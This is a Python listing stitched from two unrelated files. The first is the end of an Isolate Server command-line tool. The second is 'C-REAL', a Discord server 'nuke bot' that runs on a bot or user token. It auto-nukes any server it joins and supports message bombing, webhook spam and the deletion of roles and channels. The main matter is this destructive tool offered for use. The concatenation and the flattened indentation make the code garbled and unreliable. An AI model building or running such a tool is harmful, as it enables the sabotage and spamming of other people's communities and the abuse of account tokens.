'--blacklist',
action='append',
default=list(DEFAULT_DENYLIST),
help='List of regexp to use as denylist filter when uploading '
'directories')
def add_isolate_server_options(parser):
"""Adds --isolate-server and --namespace options to parser."""
parser.add_option(
'-I', '--isolate-server',
metavar='URL', default=os.environ.get('ISOLATE_SERVER', ''),
help='URL of the Isolate Server to use. Defaults to the environment '
'variable ISOLATE_SERVER if set. No need to specify https://, this '
'is assumed.')
parser.add_option(
'--namespace',
default='default-gzip',
help='The namespace to use on the Isolate Server, default: %default')
def process_isolate_server_options(parser, options, required):
"""Processes the --isolate-server option.
Returns the identity as determined by the server.
"""
if not options.isolate_server:
if required:
parser.error('--isolate-server is required.')
return
try:
options.isolate_server = net.fix_url(options.isolate_server)
except ValueError as e:
parser.error('--isolate-server %s' % e)
try:
return auth.ensure_logged_in(options.isolate_server)
except ValueError as e:
parser.error(str(e))
return None
def add_cache_options(parser):
cache_group = optparse.OptionGroup(parser, 'Isolated cache management')
cache_group.add_option(
'--cache', metavar='DIR', default='cache',
help='Directory to keep a local cache of the files. Accelerates download '
'by reusing already downloaded files. Default=%default')
cache_group.add_option(
'--max-cache-size',
type='int',
metavar='NNN',
default=50*1024*1024*1024,
help='Trim if the cache gets larger than this value, default=%default')
cache_group.add_option(
'--min-free-space',
type='int',
metavar='NNN',
default=2*1024*1024*1024,
help='Trim if disk free space becomes lower than this value, '
'default=%default')
cache_group.add_option(
'--max-items',
type='int',
metavar='NNN',
default=100000,
help='Trim if more than this number of items are in the cache '
'default=%default')
parser.add_option_group(cache_group)
def process_cache_options(options, trim, **kwargs):
if options.cache:
policies = local_caching.CachePolicies(
options.max_cache_size,
options.min_free_space,
options.max_items,
# 3 weeks.
max_age_secs=21 * 24 * 60 * 60)
# |options.cache| path may not exist until DiskContentAddressedCache()
# instance is created.
return local_caching.DiskContentAddressedCache(
six.text_type(os.path.abspath(options.cache)), policies, trim, **kwargs)
return local_caching.MemoryContentAddressedCache()
class OptionParserIsolateServer(logging_utils.OptionParserWithLogging):
def __init__(self, **kwargs):
logging_utils.OptionParserWithLogging.__init__(
self,
version=__version__,
prog=os.path.basename(sys.modules[__name__].__file__),
**kwargs)
auth.add_auth_options(self)
def parse_args(self, *args, **kwargs):
options, args = logging_utils.OptionParserWithLogging.parse_args(
self, *args, **kwargs)
auth.process_auth_options(self, options)
return options, args
def main(args):
dispatcher = subcommand.CommandDispatcher(__name__)
return dispatcher.execute(OptionParserIsolateServer(), args)
if __name__ == '__main__':
subprocess42.inhibit_os_error_reporting()
fix_encoding.fix_encoding()
tools.disable_buffering()
colorama.init()
net.set_user_agent('isolateserver.py/' + __version__)
sys.exit(main(sys.argv[1:]))
c-realV2.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# discord
import discord, sys, requests, os, time
from discord.ext import commands
import asyncio
from packaging import version
from random import randint, choice, randrange, random, choices
from threading import Thread
from inputimeout import inputimeout, TimeoutOccurred
from queue import Queue
from io import BytesIO
from pathlib import Path
from math import ceil
from copy import deepcopy
if sys.platform == 'linux':
import simplejson as json
else:
import json
# style
from colorama import init, Fore
init(autoreset=True)
#
__TITLE__ = "C-REAL"
__VERSION__ = "2.4.0"
__AUTHOR__ = "TKperson"
__LICENSE__ = "MIT"
# Global vars
per_page = 15
commands_per_page = 5
number_of_bomb_default = 250
selected_server = None
sorted_commands = []
webhook_targets = []
saved_ctx = None
nuke_on_join = False
auto_nick = False
auto_status = False
selfbot_has_perm = False
timeout = 6
fetching_members = False
bad_filename_map = dict((ord(char), None) for char in '<>:"\\/|?*')
grant_all_permissions = False
# normal functions==============
def exit():
try:
input('Press enter to exit...')
except (EOFError, KeyboardInterrupt):
pass
sys.exit(1)
def banner():
"""Handler for non-unicode consoles"""
sys.stdout.buffer.write(f'''\
██████╗ ██████╗ ███████╗ █████╗ ██╗
██╔════╝ ██╔══██╗██╔════╝██╔══██╗██║ Version: {__VERSION__}
██║ █████╗ ██████╔╝█████╗ ███████║██║ Made by:
██║ ╚════╝ ██╔══██╗██╔══╝ ██╔══██║██║ TKperson
╚██████╗ ██║ ██║███████╗██║ ██║███████╗ and
╚═════╝ ╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ cyxl
'''.encode('utf8'))
if version.parse('1.5.1') > version.parse(discord.__version__):
print('Please update your discord.py.')
exit()
settings = {"token":None,"permissions":[],"bot_permission":"2146958847","command_prefix":".","bot_status":"offline","verbose":15,"bomb_messages":{"random":None,"fixed":[]},"webhook_spam":{"usernames":[],"pfp_urls":[],"contents":[]},"after":[],"proxies":[],"ban_whitelist":[]}
def setUp():
# check location
from glob import glob
config = None
config_parent_dir = os.path.join(Path().absolute().__str__(), 'data')
config_path = os.path.join(config_parent_dir, 'default.json')
json_paths = glob(os.path.join(Path().absolute().__str__(), 'data', '*.json'))
def getConfig(choice, timeout):
while True:
# it really doesn't matter if I use triple quotes or not.... the speed is going to be the same and doing this looks better
print('=========================')
print('| |')
print('| [{0}] Load default.json |'.format('1' if 1 in choice else 'x'))
print('| [{0}] Select .json file |'.format('2' if 2 in choice else 'x'))
print('| [{0}] Create a new json |'.format('3' if 3 in choice else 'x'))
print('| |')
print('=========================')
print('[x] = not Available;')
try:
response = inputimeout(prompt='Auto boot with choice [1] in %d seconds...\nChoose 1, 2, or 3\n>> ' % timeout, timeout=timeout)
except TimeoutOccurred:
response = '1'
if response == '1':
if not os.path.isfile(config_path):
print(f'Unable to find file: {config_path}')
continue
with open(config_path, 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
                        print(f'An error occurred while reading the configuration file. File path -> {config_path}\nI recommend using https://jsonlint.com/?code= to check the configuration file. Skipping default.json...')
break
elif response == '2':
while True:
print('=========================')
print('0) Go back')
for i, path in enumerate(json_paths):
print(f'{str(i+1)}) {path}')
index = input('Select the .json file.\n>> ')
if not index.isdigit() or not (0 <= (index := int(index)) <= len(json_paths)):
                        print(f'You need to enter an integer between 0 and {len(json_paths)} inclusive.')
continue
if index == 0:
timeout = 999999
break
with open(json_paths[index-1], 'r', encoding='utf8') as f:
try:
return json.loads(f.read())
except json.decoder.JSONDecodeError:
                            print(f'An error occurred while reading the configuration file. File path -> {json_paths[index-1]}\nI recommend using https://jsonlint.com/?code= to check the configuration file. Skipping this file...')
elif response == '3':
break
global settings, settings_copy
if os.path.isfile(config_path): # have default.json
config = getConfig([1,2,3], 5)
elif len(json_paths) > 0: # dont have default.json but have other .json file
config = getConfig([2,3], 999999)
if config is not None:
settings.update(config)
else:
try:
# from getpass import getpass
# settings['token'] = getpass('Enter token. Note: Whatever you entered here will not be displayed.\n>> ')
            settings['token'] = input('Enter token.\n>> ')
settings['permissions'].append(input('\nEnter your discord tag or user ID. It is recommended to use discord user ID because some unicode names are hard for the code to check.\n>> '))
except KeyboardInterrupt:
sys.exit(0)
except EOFError:
print('Invalid input/EOFError. This may be caused by some unicode.')
exit()
print('\nTips:')
print('The default command_prefix is: .')
    print(f'Your current command_prefix is: {settings["command_prefix"]}')
print(f'Use {settings["command_prefix"]}config to config the settings and more info about how to config.\n')
print('Join our discord https://discord.gg/REMwN7s68S')
settings_copy = deepcopy(settings)
setUp()
# token, permissions, bomb_messages, webhook_spam, bot_permission, command_prefix, bot_status, verbose, after, proxies = readJson()
want_log_request = want_log_console = want_log_message = want_log_errors = 0
def updateVerbose():
global want_log_request, want_log_console, want_log_message, want_log_errors
verbose = settings['verbose']
want_log_request = verbose & 1 << 0
want_log_console = verbose & 1 << 1
want_log_message = verbose & 1 << 2
want_log_errors = verbose & 1 << 3
updateVerbose()
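# Hedged illustration (not used anywhere) of how the 'verbose' bitmask above
# decodes: bit 0 -> request logging, bit 1 -> console, bit 2 -> messages,
# bit 3 -> errors. The default verbose=15 (0b1111) enables all four, while
# e.g. verbose=10 (0b1010) would enable only console and error logging.
def _describe_verbose(verbose):
    """Minimal sketch mirroring updateVerbose(); returns the enabled flags."""
    flags = ['request', 'console', 'message', 'errors']
    return [name for bit, name in enumerate(flags) if verbose & (1 << bit)]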
# def randomProxy(protocol):
# # As long it works fine then i'm using this method
# if proxies is None or len(proxies) == 0:
# return None
# return {protocol: choice(proxies)}
is_selfbot = True
headers = {}
def checkToken(token=None):
if token is None:
token = settings['token']
global is_selfbot, headers
try:
headers = {'authorization': token, 'content-type': 'application/json'}
print('Checking selfbot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
            # This was the hardest thing to find; it took ages to learn that "Bot <token>" is the bot's authorization header.
# Reading source codes is always a good thing :)
headers['authorization'] = 'Bot ' + token
print('Checking normal bot token.', end='\r')
if not 'id' in requests.get(url='https://discord.com/api/v8/users/@me', timeout=timeout, headers=headers).json():
print('Invalid token is being used.')
exit()
else:
is_selfbot = False
# except requests.exceptions.ProxyError:
# print('Bad proxy is being used. You can try to change a proxy or restart the bot.')
# exit()
# except requests.exceptions.ConnectTimeout:
# print(f'Proxy reached maximum load time: timeout is {timeout} seconds long.')
# exit()
except requests.exceptions.ConnectionError:
        print('You need an internet connection to use any Discord-related features. If you are connected to wifi and still see this message, try turning off your VPN/proxy/TOR node. If that does not help, or you do not want to turn off your VPN, you can use services like repl/heroku/google cloud to host the bot for you. The source code is at https://github.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot.')
exit()
except (requests.exceptions.InvalidHeader, json.decoder.JSONDecodeError):
print('Invalid token is being used.')
exit()
checkToken()
### check updates
print('Checking update... ', end='\r')
github_version = requests.get('https://raw.githubusercontent.com/TKperson/Nuking-Discord-Server-Bot-Nuke-Bot/master/VERSION.txt').text
if version.parse(github_version) > version.parse(__VERSION__):
print(f'New C-REAL update has been launched -> {github_version} <- :party:')
print('Loading scripts...' + ' ' * 15, end='\r')
"""
command_prefix - command prefix
case_insensitive - commands will be callable without case restrictions if this is set to true
self_bot - self_bot: :class:`bool`
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
intents - intents: :class:`Intents`
The intents that you want to enable for the session. This is a way of
disabling and enabling certain gateway events from triggering and being sent.
If not given, defaults to a regularly constructed :class:`Intents` class.
"""
async def determine_prefix(bot, message): # https://stackoverflow.com/questions/56796991/discord-py-changing-prefix-with-command
return settings['command_prefix']
# client = commands.Bot(command_prefix=determine_prefix, case_insensitive=True, self_bot=is_selfbot, proxies=randomProxy('http'))
client = commands.Bot(command_prefix=settings['command_prefix'], case_insensitive=True, self_bot=is_selfbot, intents=discord.Intents().all())
client.remove_command('help')
######### Events #########
@client.event
async def on_connect():
if is_selfbot:
for user in settings['permissions']:
if str(client.user.id) == user or f'{client.user.name}#{client.user.discriminator}' == user:
global selfbot_has_perm
selfbot_has_perm = True
settings['permissions'].append(str(client.user.id))
global sorted_commands
sorted_commands = sorted(client.commands, key=lambda e: e.name[0])
await changeStatus(None, settings['bot_status'])
@client.event
async def on_ready():
banner()
print('/+========================================================')
print(f'| | {Fore.GREEN}Bot ready.')
print(f'| {Fore.MAGENTA}+ Logged in as')
print(f'| | {client.user.name}#{client.user.discriminator}')
print(f'| | {client.user.id}')
print(f'| {Fore.MAGENTA}+ Permission given to ')
for permission in settings['permissions']:
print(f'| | {permission}')
print(f'| {Fore.MAGENTA}+ Command prefix: ' + settings['command_prefix'])
if is_selfbot:
print(f'| {Fore.YELLOW}+ [Selfbot] This is a selfbot. Join servers with join codes.')
else:
print(f'| {Fore.YELLOW}+ https://discord.com/api/oauth2/authorize?client_id={client.user.id}&permissions={settings["bot_permission"]}&scope=bot')
print('| ~*************************************')
print('\\+-----')
@client.event
async def on_disconnect():
'''
    on_disconnect - runs when the client loses its connection to the account.
    Usage: reset the status to offline.
'''
await changeStatus(None, 'offline')
### logs ###
async def log(ctx, message):
"""
Logging messages to the user
no args, but has settings.
Modes:
- Discord side
- coming soon
"""
if want_log_message:
# if not isDM(ctx) and ctx.guild.id == selected_server.id and 1 << 11 & selected_server.me.guild_permissions.value == 0:
# consoleLog(message, True)
# else:
try:
await ctx.send(message)
except discord.errors.HTTPException:
for i in range(ceil(len(message) / 2000)):
await log(ctx, message[2000 * i:2000 * (i + 1)])
except:
consoleLog(message)
def consoleLog(message, print_time=False):
if want_log_console:
TIME = ''
if print_time:
TIME = f'{Fore.MAGENTA}[{time.strftime("%H:%M:%S", time.localtime())}] {Fore.RESET}'
try:
print(f'{TIME}{message}')
except TypeError: # when there's a character that can't be logged with python print function.
sys.stdout.buffer.write(f'{TIME}{message}'.encode('utf8'))
@client.event
async def on_command_error(ctx, error):
# source: https://gist.github.com/AileenLumina/510438b241c16a2960e9b0b014d9ed06
# source: https://github.com/Rapptz/discord.py/blob/master/discord/errors.py
"""
Error handlers
It's always a good idea to look into the source code to find things that are hard to find on the internet.
"""
# Debug mode
# raise error
if not want_log_errors or hasattr(ctx.command, 'on_error'):
return
# get the original exception
error = getattr(error, 'original', error)
# print(error)
# print(str(type(error)))
if isinstance(error, commands.CommandNotFound):
if checkPerm(ctx):
try:
await log(ctx, f'Command `{ctx.message.content}` is not found.')
except discord.errors.HTTPException:
await log(ctx, 'That command is not found.')
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, discord.Forbidden):
await log(ctx, f'403 Forbidden: Missing permission.')
elif isinstance(error, discord.errors.HTTPException): # usually caused by sending over 2000 characters limit
# has already been handled in "def log"
pass
elif isinstance(error, commands.UserInputError):
await log(ctx, 'Invalid input.')
else:
# 'args', 'code', 'response', 'status', 'text', 'with_traceback'
# print(error)
# print(error.args)
# print(type(error.args))
try: # Don't want too many things logged into discord
await log(ctx, '%s' % error.args)
except discord.errors.NotFound: # When ctx.channel is deleted
pass
        except TypeError: # When there's a character that can't be logged into discord, e.g. if error.args contains a tuple that can't be automatically turned into a string.
consoleLog(f'{Fore.RED}Error -> {error.args}: {Fore.YELLOW}When using "{ctx.message.content}".', True)
if is_selfbot:
@client.event
async def on_message(message):
if message.content.startswith(settings["command_prefix"]) and checkPerm(await client.get_context(message)):
if message.author.id == client.user.id and not selfbot_has_perm:
                consoleLog(f'{Fore.YELLOW}Account owner {Fore.LIGHTBLUE_EX}"{client.user.name}#{client.user.discriminator}" {Fore.YELLOW}tried to use {Fore.LIGHTBLUE_EX}"{message.content}"{Fore.BLUE}. Too bad, he/she doesn\'t have the power to use this bot.', True)
return
message.author = client.user
await client.process_commands(message)
@client.event
async def on_guild_join(guild):
if nuke_on_join:
global selected_server
selected_server = guild
await nuke(saved_ctx)
def isDM(ctx):
"""
    No args.
    Checks whether ctx comes from a DM or from a server; some commands are handled differently in each case.
"""
return isinstance(ctx.channel, discord.channel.DMChannel)
# if isinstance(ctx.channel, discord.channel.DMChannel):
# return True # in dm
# return False # in server
def nameIdHandler(name):
"""
<@! ID > = pinging user
<@& ID > = pinging role
    Usage - remove the brackets around the ID
return - the ID
"""
if name.startswith('<@!') or name.startswith('<@&'):
return name[:-1][3:]
return name
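# Hedged, illustrative self-checks of nameIdHandler(): a user mention
# '<@!123456789>' or role mention '<@&123456789>' is reduced to the raw ID,
# while a plain name or bare ID passes through unchanged.
assert nameIdHandler('<@!123456789>') == '123456789'
assert nameIdHandler('example_name') == 'example_name'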
async def embed(ctx, n, title, array):
"""
Parameters:
    n - page number; defaults to 1
    title - command name/title
    array - the list to paginate
"""
if not n.isdigit() or (n := int(n) - 1) < 0:
await log(ctx, 'Bad page number.')
return
names = ''
ids = ''
item_length = len(array)
if item_length == 0:
return await ctx.send(f'{title} count: 0')
init_item = n * per_page
final_item = init_item + per_page
if init_item > item_length - per_page:
if init_item > item_length:
await ctx.send('Invalid page number.')
return
final_item = init_item + (item_length % per_page)
else:
final_item = init_item + per_page
for i in range(init_item, final_item, 1):
item = array[i]
if len(item.name) > 17:
item.name = item.name[:17] + '...'
names += f'{item.name}\n'
ids += f'{str(item.id)}\n '
# if not isDM(ctx) and 1 << 11 & selected_server.me.guild_permissions.value == 0 and (selected_server is None or ctx.guild.id == selected_server.id):
# names = names.split('\n')
# ids = ids.split(' ')
# consoleLog(f'\n{Fore.GREEN}*{title}*\n{Fore.RESET}Total count: {Fore.YELLOW}{str(item_length)}\n{Fore.GREEN}__Name__{" " * 13}{Fore.CYAN}__ID__\n{ "".join([(Fore.GREEN + names[i].ljust(21) + Fore.CYAN + ids[i]) for i in range(len(names) - 1)]) }{Fore.YELLOW}{n+1}/{str(ceil(item_length / per_page))}', True)
# else:
try:
theColor = randint(0, 0xFFFFFF)
embed = discord.Embed(
title = title,
description = f'Total count: {str(item_length)}; color: #{hex(theColor)[2:].zfill(6)}',
color = theColor
)
embed.add_field(name='Name', value=names, inline=True)
embed.add_field(name='ID', value=ids, inline=True)
embed.set_footer(text=f'{n+1}/{str(ceil(item_length / per_page))}')
await ctx.send(embed=embed)
except:
names = names.split('\n')
ids = ids.split(' ')
await ctx.send(f'```*{title}*\nTotal count: {str(item_length)}\n__Name__{" " * 13}__ID__\n{ "".join([(names[i].ljust(21) + ids[i]) for i in range(len(names) - 1)]) }{n+1}/{str(ceil(item_length / per_page))}```')
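# Hedged worked example (not called anywhere) of the pagination math used by
# embed() above: with the default per_page=15, page 2 covers items 15..29 and
# a 40-item list spans ceil(40 / 15) = 3 pages, the last one holding 10 items.
def _example_page_bounds(page_number, item_length):
    """Minimal sketch; returns the (start, end) slice indices for one page."""
    init_item = (page_number - 1) * per_page
    final_item = min(init_item + per_page, item_length)
    return init_item, final_item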
async def hasTarget(ctx):
"""
    Checks if there's a selected server before running commands.
"""
if selected_server is not None:
return True
elif not isDM(ctx):
await connect(ctx)
        await log(ctx, f'You have been automatically connected (`{settings["command_prefix"]}connect`) to server `{selected_server.name}` because you used a command inside a server while not connected to one.')
return True
else:
await log(ctx, f'I am not connected to a server. Try `{settings["command_prefix"]}servers` and `{settings["command_prefix"]}connect`')
return False
def containing(a, b):
for c in a:
if c.name.lower() == b.lower() or str(c.id) == b:
return c
return None
def checkPerm(ctx):
if grant_all_permissions:
return True
for user in settings['permissions']:
if str(ctx.author.id) == user or f'{ctx.author.name}#{ctx.author.discriminator}' == user:
return True
if not isDM(ctx):
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in server {Fore.LIGHTYELLOW_EX}"{ctx.guild.name}"{Fore.RESET}, at channel {Fore.LIGHTYELLOW_EX}"{ctx.channel.name}"{Fore.RESET}.', True)
else:
consoleLog(f'{Fore.LIGHTRED_EX}{ctx.author.name}#{ctx.author.discriminator} {Fore.RESET}tried to use {Fore.LIGHTYELLOW_EX}"{ctx.message.content}" {Fore.RESET}in {Fore.LIGHTYELLOW_EX}the bot\'s direct message{Fore.RESET}.', True)
return False
def fixedChoice():
return settings['bomb_messages']['fixed'][randint(0, len(settings['bomb_messages']['fixed']) - 1)]
base64_char = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'
def random_b64(n=0):
return ''.join(choices(base64_char, k=settings['bomb_messages']['random'] if n == 0 else n))
alphanum = '0123456789!@#$%^&*ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
def random_an():
return ''.join(choices(alphanum, k=settings['bomb_messages']['random']))
def sendMessagePerm(ctx):
pass
def checkTalkPerm(ctx):
if isDM(ctx): # you can always talk in dm
return True
# return calcPerm(ctx, ) and 16384 & ctx.channel.
def configIsSaved():
# global settings_copy, settings # idk why python did this but after adding this for my 3.8.5 python it works
return settings_copy == settings
# class discordMember:
# def __init__(self, name, id_, discriminator=None, channel_id=None):
# self.name = name
# self.id = id_
# self.discriminator = discriminator
# self.channel_id = channel_id
# server_members = []
# def copyMember(author):
# server_members.append(discordMember(author['username'], author['id'], author['discriminator']))
# def autoFindChannel():
# for channel in selected_server.text_channels:
# for name in ['join', 'welcome', 'incoming']:
# if name in channel.name:
# return channel.id
# return None
######### Commands ##########
######### Listing ##########
@commands.check(checkPerm)
@client.command(name='help', aliases=['h', 'commands'])
async def help(ctx, asked_command=None):
help_list = '```'
if asked_command is None:
for command in sorted_commands:
help_list += f'[{command.name}] '
        await ctx.send(help_list + f'\n\nYou can try {settings["command_prefix"]}help <command> to see all the aliases for the command. Or read the manual.md for more information about the commands.```')
else:
for command in sorted_commands:
if asked_command.lower() == command.name.lower():
help_command = f'```{settings["command_prefix"]}<{command.name}'
                for alias in command.aliases:
                    help_command += f'|{alias}'
help_command += '>'
for param, default in command.params.items():
if param == 'ctx':
continue
if default.empty is not default.default:
help_command += ' {' + param + '=' + str(default.default) + '}'
else:
help_command += ' [' + param + ']'
if default.kind.name == 'KEYWORD_ONLY':
break
help_command += '```'
await ctx.send(help_command)
return
await log(ctx, f'Unable to find command `{asked_command}`.')
@commands.check(checkPerm)
@client.command(name='servers', aliases=['se', 'server'])
async def servers(ctx, n='1'):
await embed(ctx, n, 'Servers', client.guilds)
@commands.check(checkPerm)
@client.command(name='channels', aliases=['tc', 'textchannels', 'textchannel', 'channel'])
async def channels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Text channels', selected_server.text_channels)
@commands.check(checkPerm)
@client.command(name='roles', aliases=['ro', 'role'])
async def roles(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Roles', selected_server.roles)
@commands.check(checkPerm)
@client.command(name='categories', aliases=['cat', 'category'])
async def categories(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Categories', selected_server.categories)
@commands.check(checkPerm)
@client.command(name='voiceChannels', aliases=['vc', 'voicechannel'])
async def voiceChannels(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Voice channels', selected_server.voice_channels)
@commands.check(checkPerm)
@client.command(name='emojis', aliases=['em', 'emoji'])
async def emojis(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Emojis', selected_server.emojis)
@commands.check(checkPerm)
@client.command(name='members', aliases=['me', 'member'])
async def members(ctx, command='1', *, args=None):
if not await hasTarget(ctx):
return
print(len(selected_server.members))
await embed(ctx, command, 'Members', selected_server.members)
# global server_members
# if command.isdigit():
# if is_selfbot:
# await embed(ctx, command, 'Members', server_members)
# else:
# await embed(ctx, command, 'Members', selected_server.members)
# else:
# # def gFetchableChannel(channel_id): # check if the channel is good for fectching channel
# # pass
# if command == 'fetch':
# global fetching_members
# args = args.split()
# if not is_selfbot:
# await log(ctx, f'Fetch command is only made for selfbot; since you are using normal bots, all members in the server `{selected_server.name}` has already be fetched. Try `{settings["command_prefix"]}members` to see all the fetched members.')
# return
# if args[0].lower() == 'auto':
# channel_id = autoFindChannel()
# if channel_id is None:
# await log(ctx, f'Unable to find welcome channels. You have to enter the welcome channel\'s in server `{selected_server.name}` manually.')
# return
# elif args[0].lower() == 'stop':
# fetching_members = False
# await log(ctx, 'Fetching stopped.')
# return
# elif args[0].isdigit():
# channel_id = args[0]
# else:
# await log(ctx, 'Invalid argument: You can only enter `fetch auto` or `fetch <channel_id>`.')
# return
# # Making sure channel_id is a string
# channel_id = str(channel_id)
# if len(args) < 3:
# cooldown = 0
# elif args[2].isdigit():
# cooldown = int(args[2])
# else:
# await log(ctx, 'Please set a positive integer for the cooldown time of fetching every 100 messages. Use `0` if you don\'t want a cooldown.')
# return
# if args[1].lower() == 'fast':
# fetching_members = True
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?limit=100'
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# while fetching_members:
# r = requests.get(url, headers=headers, proxies=randomProxy('https'), timeout=timeout).json()
# if len(r) == 0:
# break
# for message in r:
# if message['mentions']: # len(message['content']) > 0 and
# for mention in message['mentions']:
# copyMember(mention)
# elif len(message['attachments']) > 0:
# pass # no handler for images
# elif len(message['embeds']) > 0:
# pass # no handlers for embeds mentions
# else:
# copyMember(message['author'])
# url = f'https://discord.com/api/v8/channels/{channel_id}/messages?before={r[-1]["id"]}&limit=100'
# if cooldown > 0:
# await asyncio.sleep(cooldown)
# elif args[1].lower() == 'all':
# await log(ctx, f'```Fetching has started.\nCheck progress: `{settings["command_prefix"]}members`\nStop fetching: `{settings["command_prefix"]}members fetch stop`.\nCooldown: `{cooldown}` seconds.\nNote: duplicated users will only get removed after the fetching stops.```')
# pass
# else:
# await log(ctx, 'You need to choose a fetching operation. Options are `all` or `fast`.')
# # Removing duplicates
# if len(server_members) > 1:
# temp = []
# temp.append(server_members[0])
# for member_ in server_members:
# for i in temp:
# temp.append(member_)
# server_members = temp
@commands.check(checkPerm)
@client.command(name='bans')
async def bans(ctx, n='1'):
if not await hasTarget(ctx):
return
await embed(ctx, n, 'Bans', [s.user for s in await selected_server.bans()])
@commands.check(checkPerm)
@client.command(name='connect', aliases=['con'])
async def connect(ctx, *, server=None):
if server is None and ctx.guild is None:
await log(ctx, f'Providing a server name is required.')
return
if server is None and not isDM(ctx):
server = ctx.guild
else:
temp_name = server
server = containing(client.guilds, server)
if server is None:
await log(ctx, f'Unable to find {temp_name} server.')
return
global selected_server
selected_server = server
await log(ctx, f'Successfully connected to `{server.name}`.')
######### Unities ##########
@commands.check(checkPerm)
@client.command(name='addChannel', aliases=['aCh', 'aChannel'])
async def addChannel(ctx, channel_name, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_text_channel(channel_name, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added channel `{channel_name}` to category `{category}`.')
except:
await log(ctx, f'Unable to add channel `{channel_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addVoiceChannel', aliases=['aVoiceChannel', 'aVC'])
async def addVoiceChannel(ctx, voice_channel, *, category=None):
if not await hasTarget(ctx):
return
if category is not None:
temp = category
category = containing(selected_server.categories, category)
if category is None:
await log(ctx, f'Unable to find category `{temp}`.')
return
try:
await selected_server.create_voice_channel(voice_channel, category=category)
if category is None:
category = 'No category.'
else:
category = category.name
await log(ctx, f'Successfully added VC `{voice_channel}` to category `{category}`.')
except:
await log(ctx, f'Unable to add VC `{voice_channel}`.')
raise
@commands.check(checkPerm)
@client.command(name='addEmoji', aliases=['aEmoji', 'aEm'])
async def addEmoji(ctx, item, *, name=None, bits=None):
if not await hasTarget(ctx):
return
if bits is None:
# Raw IPv4 and IPv6 are not supported
if item.startswith(('https://', 'http://', 'ftp://', 'ftps://')): # Link EX: https://www.example.com/aaa.png
try:
if name is None:
await log(ctx, 'Name for emoji? I\'m not always going to name it for you...')
return
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(item).content).read())
await log(ctx, f'Successfully added emoji `{name}`.')
except:
raise
elif item[0] == '<': # EX: <a:triggeredd:627060014431076352>
item = item.split(':')
if name is None:
name = item[1]
try:
if item[0] == '<a': # Animated
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.gif?v=1').content).read())
else:
await selected_server.create_custom_emoji(name=(name), image=BytesIO(requests.get(f'https://cdn.discordapp.com/emojis/{item[2][:-1]}.png?v=1').content).read())
await log(ctx, f'Successfully added emoji: {name}')
except:
raise
elif os.path.isfile(item): # File EX: C:\Users\user\Desktop\something.jpg or EX: .\icon\something.jpg
with open(item, 'rb') as data:
await selected_server.create_custom_emoji(name=(name), image=data.read())
await log(ctx, f'Successfully added emoji: {name}')
else:
await log(ctx, 'Bad path to image.')
else:
        await selected_server.create_custom_emoji(name=name, image=bits)
@commands.check(checkPerm)
@client.command(name='addCategory', aliases=['aCat', 'aCa'])
async def addCategory(ctx, *, category_name):
if not await hasTarget(ctx):
return
try:
await selected_server.create_category(category_name)
await log(ctx, f'Successfully created category `{category_name}`.')
except:
await log(ctx, f'Unable to create category `{category_name}`.')
raise
@commands.check(checkPerm)
@client.command(name='addRole', aliases=['aRole', 'aR'])
async def addRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
perms = name.pop(-1)
await selected_server.create_role(name=' '.join(name), permissions=discord.Permissions(permissions=int(perms)))
await log(ctx, f'Successfully added role `{name}` with permission `{perms}`.')
except:
await log(ctx, f'Failed to add role `{name}`.')
raise
@commands.check(checkPerm)
@client.command(name='moveRole', aliases=['mRole', 'mR'])
async def moveRole(ctx, *, name):
if not await hasTarget(ctx):
return
try:
name = name.split()
position = name.pop(-1)
name = ' '.join(name)
if len(name) == 0 or not position.isdigit():
await log(ctx, 'Invalid inputs.')
return
        role = containing(selected_server.roles, name)
        if role is None:
            await log(ctx, f'Unable to find role `{name}`.')
            return
        await role.edit(position=int(position))
await log(ctx, f'Successfully moved role {role.name} to position `{str(position)}`.')
except:
await log(ctx, f'Unable to move role `{name}` to position `{position}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteRole', aliases=['dRole', 'dR'])
async def deleteRole(ctx, *, name):
if not await hasTarget(ctx):
return
    role = containing(selected_server.roles, name)
    if role is None:
        await log(ctx, f'Unable to find `{name}`.')
        return
try:
await role.delete()
await log(ctx, f'Successfully removed role `{role.name}`')
except:
await log(ctx, f'Unable to delete role `{role.name}`.')
raise
@commands.check(checkPerm)
@client.command(name='deleteChannel', aliases=['dChannel', 'dCh'])
async def deleteChannel(ctx, channel_name):
if not await hasTarget(ctx):
return
    channel = containing(selected_server.text_channels, channel_name)
    if channel is None:
        await log(ctx, f'Unable to find text channel `{channel_name}`.')
        return
try:
await channel.delete(reason=None)
